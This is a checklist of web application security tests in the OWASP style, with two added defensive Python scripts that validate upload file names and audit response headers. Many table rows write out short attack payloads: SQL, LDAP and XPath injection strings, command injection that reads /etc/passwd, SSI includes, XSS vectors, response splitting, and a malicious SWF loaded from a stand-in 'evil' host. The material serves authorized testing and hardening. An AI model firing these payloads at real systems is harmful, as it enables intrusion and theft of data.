
OWASP Testing Checklist

Information Gathering

| Test ID | Test Name | Description | Tools |
|---|---|---|---|
| OTG-INFO-001 | Conduct Search Engine Discovery and Reconnaissance for Information Leakage | Use a search engine to search for network diagrams and configurations, credentials, error message content. | Google Hacking, Sitedigger, Shodan, FOCA, Punkspider |
| OTG-INFO-002 | Fingerprint Web Server | Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits, using "HTTP header field ordering" and "Malformed requests test". | Httprint, Httprecon, Desenmascarame |
| OTG-INFO-003 | Review Webserver Metafiles for Information Leakage | Analyze robots.txt and identify `<META>` tags from the website. | Browser, curl, wget |
| OTG-INFO-004 | Enumerate Applications on Webserver | Find applications hosted on the web server (virtual hosts/subdomains), non-standard ports, DNS zone. | dnsrecon, Nmap, fierce, Recon-ng, Intrigue |
| OTG-INFO-005 | Review Webpage Comments and Metadata for Information Leakage | Find sensitive information in webpage comments and metadata in the source code. | Browser, curl, wget |
| OTG-INFO-006 | Identify application entry points | Identify entry points from hidden fields, parameters, methods and HTTP header analysis. | Burp Proxy, ZAP, Tamper Data |
| OTG-INFO-007 | Map execution paths through application | Map the target application and understand the principal workflows. | Burp Proxy, ZAP |
| OTG-INFO-008 | Fingerprint Web Application Framework | Find the type of web application framework/CMS from HTTP headers, cookies, source code, specific files and folders. | Whatweb, BlindElephant, Wappalyzer |
| OTG-INFO-009 | Fingerprint Web Application | Identify the web application and version to determine known vulnerabilities and the appropriate exploits. | Whatweb, BlindElephant, Wappalyzer, CMSmap |
| OTG-INFO-010 | Map Application Architecture | Identify the application architecture, including web language, WAF, reverse proxy, application server, backend database. | Browser, curl, wget |
Configuration and Deploy Management Testing

| Test ID | Test Name | Description | Tools |
|---|---|---|---|
| OTG-CONFIG-001 | Test Network/Infrastructure Configuration | Understand the interactions between infrastructure elements, configuration management for software, backend DB server, WebDAV, FTP, in order to identify known vulnerabilities. | Nessus |
| OTG-CONFIG-002 | Test Application Platform Configuration | Identify default installation files/directories, handling of server errors (40*, 50*), minimal privilege, software logging. | Browser, Nikto |
| OTG-CONFIG-003 | Test File Extensions Handling for Sensitive Information | Find important files and information (.asa, .inc, .sql, zip, tar, pdf, txt, etc.). | Browser, Nikto |
| OTG-CONFIG-004 | Backup and Unreferenced Files for Sensitive Information | Check JS source code, comments, cache files, backup files (.old, .bak, .inc, .src) and guess filenames. | Nessus, Nikto, Wikto |
| OTG-CONFIG-005 | Enumerate Infrastructure and Application Admin Interfaces | Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc.), alternative server ports (Tomcat/8080). | Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner |
| OTG-CONFIG-006 | Test HTTP Methods | Identify the HTTP methods allowed on the web server with OPTIONS. Arbitrary HTTP methods, HEAD access control bypass and XST. | netcat, curl |
| OTG-CONFIG-007 | Test HTTP Strict Transport Security | Identify the HSTS header on the web server through the HTTP response headers: `curl -s -D- \| grep Strict` | Burp Proxy, ZAP, curl |
| OTG-CONFIG-008 | Test RIA cross domain policy | Analyse the permissions allowed by the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from. | Burp Proxy, ZAP, Nikto |
Identity Management Testing

| Test ID | Test Name | Description | Tools |
|---|---|---|---|
| OTG-IDENT-001 | Test Role Definitions | Validate the system roles defined within the application by creating a permission matrix. | Burp Proxy, ZAP |
| OTG-IDENT-002 | Test User Registration Process | Verify that the identity requirements for user registration are aligned with business and security requirements. | Burp Proxy, ZAP |
| OTG-IDENT-003 | Test Account Provisioning Process | Determine which roles are able to provision users and what sort of accounts they can provision. | Burp Proxy, ZAP |
| OTG-IDENT-004 | Testing for Account Enumeration and Guessable User Account | Check for generic login error statements, return codes/parameter values, enumerate all possible valid user IDs (login system, forgot password). | Browser, Burp Proxy, ZAP |
| OTG-IDENT-005 | Testing for Weak or unenforced username policy | User account names are often highly structured (e.g. Joe Bloggs' account name is jbloggs and Fred Nurks' account name is fnurks) and valid account names can easily be guessed. | Browser, Burp Proxy, ZAP |
| OTG-IDENT-006 | Test Permissions of Guest/Training Accounts | Guest and training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorisation process required for access. Evaluate consistency between the access policy and guest/training account access permissions. | Burp Proxy, ZAP |
| OTG-IDENT-007 | Test Account Suspension/Resumption Process | Verify the identity requirements for user registration align with business/security requirements. Validate the registration process. | Burp Proxy, ZAP |
Authentication Testing

| Test ID | Test Name | Description | Tools |
|---|---|---|---|
| OTG-AUTHN-001 | Testing for Credentials Transported over an Encrypted Channel | Check whether the referrer is HTTP or HTTPS. Sending data through HTTP and HTTPS. | Burp Proxy, ZAP |
| OTG-AUTHN-002 | Testing for default credentials | Testing for default credentials of common applications, testing for default passwords of new accounts. | Burp Proxy, ZAP, Hydra |
| OTG-AUTHN-003 | Testing for Weak lock out mechanism | Evaluate the account lockout mechanism's ability to mitigate brute force password guessing. Evaluate the unlock mechanism's resistance to unauthorized account unlocking. | Browser |
| OTG-AUTHN-004 | Testing for bypassing authentication schema | Force browsing (/admin/main.php, /page.asp?authenticated=yes), parameter modification, session ID prediction, SQL injection. | Burp Proxy, ZAP |
| OTG-AUTHN-005 | Test remember password functionality | Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. autocomplete=off? | Burp Proxy, ZAP |
| OTG-AUTHN-006 | Testing for Browser cache weakness | Check for browser history issues by clicking "Back" after logging out. Check for browser cache issues in the HTTP response headers (Cache-Control: no-cache). | Burp Proxy, ZAP, Firefox add-on CacheViewer2 |
| OTG-AUTHN-007 | Testing for Weak password policy | Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of passwords. | Burp Proxy, ZAP, Hydra |
| OTG-AUTHN-008 | Testing for Weak security question/answer | Testing for weak pre-generated questions, testing for weak self-generated questions, testing for brute-forcible answers (unlimited attempts?). | Browser |
| OTG-AUTHN-009 | Testing for weak password change or reset functionalities | Test password reset (old password displayed in plain text? sent via email? random token in the confirmation email?), test password change (old password needed?), CSRF vulnerability? | Browser, Burp Proxy, ZAP |
| OTG-AUTHN-010 | Testing for Weaker authentication in alternative channel | Understand the primary mechanism and identify other channels (mobile app, call center, SSO). | Browser |
Authorization Testing

| Test ID | Test Name | Description | Tools |
|---|---|---|---|
| OTG-AUTHZ-001 | Testing Directory traversal/file include | dot-dot-slash attack (../), directory traversal, Local File Inclusion/Remote File Inclusion. | Burp Proxy, ZAP, Wfuzz |
| OTG-AUTHZ-002 | Testing for bypassing authorization schema | Access a resource without authentication? Bypass ACL, force browsing (/admin/adduser.jsp). | Burp Proxy (Autorize), ZAP |
| OTG-AUTHZ-003 | Testing for Privilege Escalation | Testing for role/privilege escalation by manipulating the values of hidden variables, e.g. changing a parameter from groupid=2 to groupid=1. | Burp Proxy (Autorize), ZAP |
| OTG-AUTHZ-004 | Testing for Insecure Direct Object References | Force a change of parameter value (?invoice=123 -> ?invoice=456). | Burp Proxy (Autorize), ZAP |
Session Management Testing

| Test ID | Test Name | Description | Tools |
|---|---|---|---|
| OTG-SESS-001 | Testing for Bypassing Session Management Schema | Session ID analysis/prediction, unencrypted cookie transport, brute force. | Burp Proxy, ForceSSL, ZAP, CookieDigger |
| OTG-SESS-002 | Testing for Cookies attributes | Check the HttpOnly and Secure flags, expiration, inspect for sensitive data. | Burp Proxy, ZAP |
| OTG-SESS-003 | Testing for Session Fixation | The application doesn't renew the cookie after a successful user authentication. | Burp Proxy, ZAP |
| OTG-SESS-004 | Testing for Exposed Session Variables | Encryption and reuse of session tokens vulnerabilities; session ID sent with the GET method? | Burp Proxy, ZAP |
| OTG-SESS-005 | Testing for Cross Site Request Forgery | URL analysis, direct access to functions without any token. | Burp Proxy (csrf_token_detect), burpy, ZAP |
| OTG-SESS-006 | Testing for logout functionality | Check session reuse after logout, both server-side and SSO. | Burp Proxy, ZAP |
| OTG-SESS-007 | Test Session Timeout | Check the session timeout; after the timeout has passed, all session tokens should be destroyed or be unusable. | Burp Proxy, ZAP |
| OTG-SESS-008 | Testing for Session puzzling | The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another. | Burp Proxy, ZAP |
Data Validation Testing

| Test ID | Test Name | Description | Tools |
|---|---|---|---|
| OTG-INPVAL-001 | Testing for Reflected Cross Site Scripting | Check for input validation, replace the vector used to identify XSS, XSS with HTTP Parameter Pollution. | Burp Proxy, ZAP, Xenotix XSS |
| OTG-INPVAL-002 | Testing for Stored Cross Site Scripting | Check input forms/upload forms and analyze the HTML code, leverage XSS with BeEF. | Burp Proxy, ZAP, BeEF, XSS Proxy |
| OTG-INPVAL-003 | Testing for HTTP Verb Tampering | Craft custom HTTP requests to test the other methods to bypass URL authentication and authorization. | netcat |
| OTG-INPVAL-004 | Testing for HTTP Parameter pollution | Identify any form or action that allows user-supplied input to bypass input validation and filters using HPP. | ZAP, HPP Finder (Chrome plugin) |
| OTG-INPVAL-005 | Testing for SQL Injection | Union, boolean, error based, out-of-band, time delay. | Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB) |
| | Oracle Testing | Identify URLs for PL/SQL web applications, access with PL/SQL packages, bypass PL/SQL exclusion list, SQL injection. | Orascan, SQLInjector |
| | MySQL Testing | Identify MySQL version, single quote, information_schema, read/write file. | SQLMap, Mysqloit, Power Injector |
| | SQL Server Testing | Comment operator (--), query separator (;), stored procedures (xp_cmdshell). | SQLMap, SQLninja, Power Injector |
| | Testing PostgreSQL | Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/write file, shell injection (OS command). | SQLMap |
| | MS Access Testing | Enumerate the columns through error-based (GROUP BY), obtain the database schema combined with fuzzdb. | SQLMap |
| | Testing for NoSQL injection | Identify NoSQL databases, pass special characters (`' " \ ; { }`), attack with reserved variable names, operators. | NoSQLMap |
| OTG-INPVAL-006 | Testing for LDAP Injection | `/ldapsearch?user=*`, `user=*)(uid=*))(\|(uid=*`, `pass=password` | Burp Proxy, ZAP |
| OTG-INPVAL-007 | Testing for ORM Injection | Testing ORM injection is identical to SQL injection testing. | Hibernate, NHibernate |
| OTG-INPVAL-008 | Testing for XML Injection | Check with XML meta characters `' " <> <!--/--> & <![CDATA[ / ]]>`, XXE, TAG. | Burp Proxy, ZAP, Wfuzz |
| OTG-INPVAL-009 | Testing for SSI Injection | Presence of the .shtml extension; check for these characters: `< ! # = / . " - >` and [a-zA-Z0-9]; include string: `<!--#include virtual="/etc/passwd" -->` | Burp Proxy, ZAP |
| OTG-INPVAL-010 | Testing for XPath Injection | Check for XML error enumeration by supplying a single quote ('). Username: `' or '1' = '1`, Password: `' or '1' = '1` | Burp Proxy, ZAP |
| OTG-INPVAL-011 | IMAP/SMTP Injection | Identifying vulnerable parameters with special characters (i.e. `\ ' " @ # ! \|`); understanding the data flow and deployment structure of the client; IMAP/SMTP command injection (header, body, footer). | Burp Proxy, ZAP |
| OTG-INPVAL-012 | Testing for Code Injection | Enter OS commands in the input field: `?arg=1; system('id')` | Burp Proxy, ZAP, Liffy, Panoptic |
| | Testing for Local File Inclusion | LFI with dot-dot-slash (../../), PHP wrapper (php://filter/convert.base64-encode/resource). | Burp Proxy, fimap, Liffy |
| | Testing for Remote File Inclusion | RFI from a malicious URL: ?page.php?file= | Burp Proxy, fimap, Liffy |
| OTG-INPVAL-013 | Testing for Command Injection | Understand the application platform, OS, folder structure, relative paths and execute OS commands on a web server: `%3Bcat%20/etc/passwd`, `test.pdf+\|+Dir C:\ ` | Burp Proxy, ZAP, Commix |
| OTG-INPVAL-014 | Testing for Buffer overflow | Testing for heap overflow vulnerability; testing for stack overflow vulnerability; testing for format string vulnerability. | Immunity Canvas, Spike, MSF, Nessus |
| | Testing for Heap overflow | | |
| | Testing for Stack overflow | | |
| | Testing for Format string | | |
| OTG-INPVAL-015 | Testing for incubated vulnerabilities | File upload, stored XSS, SQL/XPath injection, misconfigured servers (Tomcat, Plesk, cPanel). | Burp Proxy, BeEF, MSF |
| OTG-INPVAL-016 | Testing for HTTP Splitting/Smuggling | `param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>` | Burp Proxy, ZAP, netcat |
Error Handling

| Test ID | Test Name | Description | Tools |
|---|---|---|---|
| OTG-ERR-001 | Analysis of Error Codes | Locate error codes generated by applications or web servers. Collect sensitive information from those errors (web server, application server, database). | Burp Proxy, ZAP |
| OTG-ERR-002 | Analysis of Stack Traces | Invalid input / empty inputs; input that contains non-alphanumeric characters or query syntax; access to internal pages without authentication; bypassing application flow. | Burp Proxy, ZAP |
Cryptography

| Test ID | Test Name | Description | Tools |
|---|---|---|---|
| OTG-CRYPST-001 | Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection | Identify the SSL service, identify weak ciphers/protocols (e.g. RC4, BEAST, CRIME, POODLE). | SSL Breacher |
| OTG-CRYPST-002 | Testing for Padding Oracle | Compare the responses in three different states: cipher text gets decrypted, resulting data is correct; cipher text gets decrypted, resulting data is garbled and causes some exception or error handling in the application logic; cipher text decryption fails due to padding errors. | PadBuster, Poracle, python-paddingoracle, POET |
| OTG-CRYPST-003 | Testing for Sensitive information sent via unencrypted channels | Check sensitive data during transmission: information used in authentication (e.g. credentials, PINs, session identifiers, tokens, cookies...); information protected by laws, regulations or specific organizational policy (e.g. credit cards, customer data). | Burp Proxy, ZAP, curl |
Business logic Testing

| Test ID | Test Name | Description | Tools |
|---|---|---|---|
| OTG-BUSLOGIC-001 | Test Business Logic Data Validation | Look for data entry points or hand-off points between systems or software. Once found, try to insert logically invalid data into the application/system. | Burp Proxy, ZAP |
| OTG-BUSLOGIC-002 | Test Ability to Forge Requests | Look for guessable, predictable or hidden functionality of fields. Once found, try to insert logically valid data into the application/system allowing the user to go through the application/system against the normal business logic workflow. | Burp Proxy, ZAP |
| OTG-BUSLOGIC-003 | Test Integrity Checks | Look for parts of the application/system (components, for example input fields, databases or logs) that move, store or handle data/information. For each identified component, determine what type of data/information is logically acceptable and what types the application/system should guard against; also consider who, according to the business logic, is allowed to insert, update and delete data/information in each component. Attempt to insert, update, edit or delete the data/information values with invalid data/information in each component (i.e. input, database, or log) as users that should not be allowed per the business logic workflow. | Burp Proxy, ZAP |
| OTG-BUSLOGIC-004 | Test for Process Timing | Look for application/system functionality that may be impacted by time, such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow (for example, not completing transactions in an expected time). Develop and execute the misuse cases, ensuring that attackers cannot gain an advantage based on any timing. | Burp Proxy, ZAP |
| OTG-BUSLOGIC-005 | Test Number of Times a Function Can be Used Limits | Look for functions or features in the application or system that should not be executed more than a single time or a specified number of times during the business logic workflow. For each such function or feature, develop abuse/misuse cases that may allow a user to execute it more than the allowable number of times. | Burp Proxy, ZAP |
| OTG-BUSLOGIC-006 | Testing for the Circumvention of Work Flows | Look for methods to skip steps, or to go through steps in the application process in a different order from the designed/intended business logic flow. For each method, develop a misuse case and try to circumvent or perform an action that is "not acceptable" per the business logic workflow. | Burp Proxy, ZAP |
| OTG-BUSLOGIC-007 | Test Defenses Against Application Mis-use | Measures that might indicate the application has built-in self-defense: changed responses; blocked requests; actions that log a user out or lock their account. | Burp Proxy, ZAP |
| OTG-BUSLOGIC-008 | Test Upload of Unexpected File Types | Review the project documentation and perform some exploratory testing looking for file types that should be "unsupported" by the application/system. Try to upload these "unsupported" files and verify that they are properly rejected. If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated (e.g. file.phtml, shell.phPWND, SHELL~1.PHP). | Burp Proxy, ZAP |
| OTG-BUSLOGIC-009 | Test Upload of Malicious Files | Develop or acquire a known "malicious" file. Try to upload the malicious file to the application/system and verify that it is correctly rejected. If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. | Burp Proxy, ZAP |
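The three names listed under OTG-BUSLOGIC-008 (file.phtml, shell.phPWND, SHELL~1.PHP) each defeat a naive "does it end in .php?" check in a different way: an alternative PHP extension, mixed case with a junk suffix, and a DOS 8.3 short-name alias. The server-side allowlist check below is an added example written for this page, not code from OWASP or from the checklist's author. It assumes a hypothetical image/document upload endpoint; the allowlist, the script-prefix list and the sample names are all constructed here, and every rejection returns a reason so the server can log which rule fired.

```python
import re
import secrets
from typing import Optional, Tuple

# Constructed allowlist for this example: the hypothetical endpoint only stores images and PDFs.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}

# Hypothetical list of prefixes that mark an extension segment as a server-side script type.
# Matching on the prefix is what catches shell.phPWND: lower-cased, its extension is "phpwnd".
SCRIPT_PREFIXES = ("php", "phtml", "phar", "asp", "jsp", "cgi", "sh", "htaccess")

SHORT_NAME_RE = re.compile(r"~\d+")                 # DOS 8.3 alias such as SHELL~1.PHP
STEM_RE = re.compile(r"[a-z0-9][a-z0-9_-]{0,63}")   # conservative charset for the file stem


def check_upload_name(filename: str) -> Tuple[bool, str]:
    """Validate a client-supplied file name against the allowlist.

    Returns (accepted, reason). Every rejection carries a reason so the
    server can log which rule fired without echoing the raw name to the user.
    """
    if not filename or "\x00" in filename:
        return False, "empty name or embedded NUL byte"
    if "/" in filename or "\\" in filename:
        return False, "path separator in file name"
    if SHORT_NAME_RE.search(filename):
        return False, "DOS 8.3 short-name pattern"
    lowered = filename.lower()
    stem, *extensions = lowered.split(".")
    if stem == "" or not extensions:
        return False, "dotfile or missing extension"
    # Look at every extension segment, not only the last one, so that
    # image.php.png is refused as well as image.php.
    for ext in extensions:
        if ext.startswith(SCRIPT_PREFIXES):
            return False, f"extension segment '{ext}' denotes a script type"
    if len(extensions) != 1:
        return False, "multiple extensions"
    if extensions[0] not in ALLOWED_EXTENSIONS:
        return False, f"extension '{extensions[0]}' not in allowlist"
    if not STEM_RE.fullmatch(stem):
        return False, "stem contains disallowed characters"
    return True, "ok"


def storage_name(filename: str) -> Optional[str]:
    """Return a server-chosen name (random hex plus the validated extension), or None if rejected.

    The client-supplied stem is never used on disk, so even an accepted name
    cannot influence where or how the file is stored.
    """
    accepted, _reason = check_upload_name(filename)
    if not accepted:
        return None
    extension = filename.lower().rsplit(".", 1)[1]
    return f"{secrets.token_hex(16)}.{extension}"


if __name__ == "__main__":
    # Constructed sample names: the three from the checklist row plus a few more edge cases.
    for name in ["photo.png", "file.phtml", "shell.phPWND", "SHELL~1.PHP",
                 "image.php.png", "report.pdf\x00.png", ".htaccess", "../evil.png"]:
        print(repr(name), check_upload_name(name))
```

The check is deliberately an allowlist with a single extension: the deny-list of script prefixes only exists to produce a more useful log reason, and the file is stored under a random server-chosen name so the client never controls the path. Content-type sniffing of the uploaded bytes would be the natural next check, and it is independent of the name.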
Client Side Testing

| Test ID | Test Name | Description | Tools |
|---|---|---|---|
| OTG-CLIENT-001 | Testing for DOM based Cross Site Scripting | Test the user inputs obtained from client-side JavaScript objects. | Burp Proxy, DOMinator |
| OTG-CLIENT-002 | Testing for JavaScript Execution | Inject JavaScript code: | Burp Proxy, ZAP |
| OTG-CLIENT-003 | Testing for HTML Injection | Send malicious HTML code: `?user=<img%20src='aaa'%20onerror=alert(1)>` | Burp Proxy, ZAP |
| OTG-CLIENT-004 | Testing for Client Side URL Redirect | Modify untrusted URL input to a malicious site (open redirect): `?redirect=www.fake-target.site` | Burp Proxy, ZAP |
| OTG-CLIENT-005 | Testing for CSS Injection | Inject code in the CSS context: `;-o-link:'javascript:alert(1)';-o-link-source:current;` (Opera [8,12]); `;-:expression(alert(URL=1));` (IE 7/8) | Burp Proxy, ZAP |
| OTG-CLIENT-006 | Testing for Client Side Resource Manipulation | External JavaScript could be easily injected into the trusted web site. | Burp Proxy, ZAP |
| OTG-CLIENT-007 | Test Cross Origin Resource Sharing | Check the HTTP headers in order to understand how CORS is used (Origin header). | Burp Proxy, ZAP |
| OTG-CLIENT-008 | Testing for Cross Site Flashing | Decompile, undefined variables, unsafe methods, include malicious SWF (http://victim/file.swf?lang=http://evil). | FlashBang, Flare, Flasm, SWFScan, SWF Intruder |
| OTG-CLIENT-009 | Testing for Clickjacking | Discover if a website is vulnerable by loading it into an iframe: create a simple web page that includes a frame containing the target. | Burp Proxy, ClickjackingTool |
| OTG-CLIENT-010 | Testing WebSockets | Identify that the application is using WebSockets by inspecting the ws:// or wss:// URI scheme. Use Google Chrome's Developer Tools to view the Network WebSocket communication. Check Origin, confidentiality and integrity, authentication, authorization, input sanitization. | Burp Proxy, Chrome, ZAP, WebSocket Client |
| OTG-CLIENT-011 | Test Web Messaging | Analyse the JavaScript code looking for how Web Messaging is implemented: how the website restricts messages from untrusted domains and how the data is handled even for trusted domains. | Burp Proxy, ZAP |
| OTG-CLIENT-012 | Test Local Storage | Determine whether the website is storing sensitive data in the storage. XSS in localStorage: `http://server/StoragePOC.html#<img src=x onerror=alert(1)>` | Chrome, Firebug, Burp Proxy, ZAP |
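Several rows of the checklist (OTG-CONFIG-007 HSTS, OTG-AUTHN-006 browser cache, OTG-SESS-002 cookie attributes and OTG-CLIENT-007 CORS) reduce to inspecting the headers of one HTTP response. The script below is an added example, not part of the checklist or of any OWASP tool: it parses a raw HTTP/1.1 response and reports those four checks side by side for a weak configuration and its corrected form. Both responses are constructed for the example; the one-year HSTS threshold, the use of `no-store` (stricter than the `no-cache` the row mentions) and the name pattern used to pick out session cookies are assumptions made for this check.

```python
import re
from typing import Dict, List, Tuple

# Constructed responses for this example (not captured from any real system).
# The first is what a weak configuration looks like; the second is the corrected form.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: JSESSIONID=c0ffee; Path=/\r\n"
    "Set-Cookie: theme=dark; Path=/\r\n"
    "Access-Control-Allow-Origin: *\r\n"
    "Access-Control-Allow-Credentials: true\r\n"
    "Cache-Control: public, max-age=3600\r\n"
    "\r\n"
    "<html>account page</html>"
)

HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Set-Cookie: JSESSIONID=c0ffee; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Set-Cookie: theme=dark; Path=/\r\n"
    "Access-Control-Allow-Origin: https://app.example\r\n"
    "Cache-Control: no-store\r\n"
    "\r\n"
    "<html>account page</html>"
)

MIN_HSTS_MAX_AGE = 31536000   # one year; threshold assumed for this check
# Assumed heuristic: cookies whose name looks session- or auth-related get the strict checks.
SESSION_COOKIE_RE = re.compile(r"sess|sid|token|auth", re.IGNORECASE)


def parse_response(raw: str) -> Tuple[str, Dict[str, List[str]]]:
    """Split a raw HTTP/1.1 response into its status line and a name -> values map.

    Header names are lower-cased; repeated headers (Set-Cookie) keep every value.
    """
    head, _sep, _body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers: Dict[str, List[str]] = {}
    for line in lines:
        name, colon, value = line.partition(":")
        if colon:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers


def audit_response(raw: str) -> List[str]:
    """Return one finding per failed check, tagged with the checklist row it belongs to."""
    _status, headers = parse_response(raw)
    findings: List[str] = []

    # OTG-CONFIG-007: HSTS must be present and long-lived.
    hsts = headers.get("strict-transport-security")
    if not hsts:
        findings.append("OTG-CONFIG-007: Strict-Transport-Security header missing")
    else:
        match = re.search(r"max-age=(\d+)", hsts[0], re.IGNORECASE)
        if not match or int(match.group(1)) < MIN_HSTS_MAX_AGE:
            findings.append("OTG-CONFIG-007: HSTS max-age shorter than one year")

    # OTG-AUTHN-006: authenticated pages must not be cacheable by the browser.
    cache_control = ",".join(headers.get("cache-control", [])).lower()
    if "no-store" not in cache_control:
        findings.append("OTG-AUTHN-006: Cache-Control lacks no-store")

    # OTG-SESS-002: session cookies carry Secure, HttpOnly and SameSite.
    for cookie in headers.get("set-cookie", []):
        name_value, *attributes = cookie.split(";")
        name = name_value.split("=", 1)[0].strip()
        if not SESSION_COOKIE_RE.search(name):
            continue
        present = {attr.strip().split("=", 1)[0].lower() for attr in attributes}
        for required in ("secure", "httponly", "samesite"):
            if required not in present:
                findings.append(f"OTG-SESS-002: cookie {name} lacks {required}")

    # OTG-CLIENT-007: browsers refuse a wildcard origin together with credentials,
    # so seeing both signals a server that intends to allow arbitrary origins.
    origin = headers.get("access-control-allow-origin", [""])[0]
    credentials = headers.get("access-control-allow-credentials", [""])[0].lower()
    if origin == "*" and credentials == "true":
        findings.append("OTG-CLIENT-007: Access-Control-Allow-Origin * together with credentials")

    return findings


if __name__ == "__main__":
    for label, response in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(response) or ["no findings"])
```

Feed it the output of `curl -s -D-` against an authenticated page and the findings list maps directly onto the checklist rows; a response that passes the CORS check here can still reflect arbitrary `Origin` values, which needs a second request with a foreign `Origin` header to detect.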
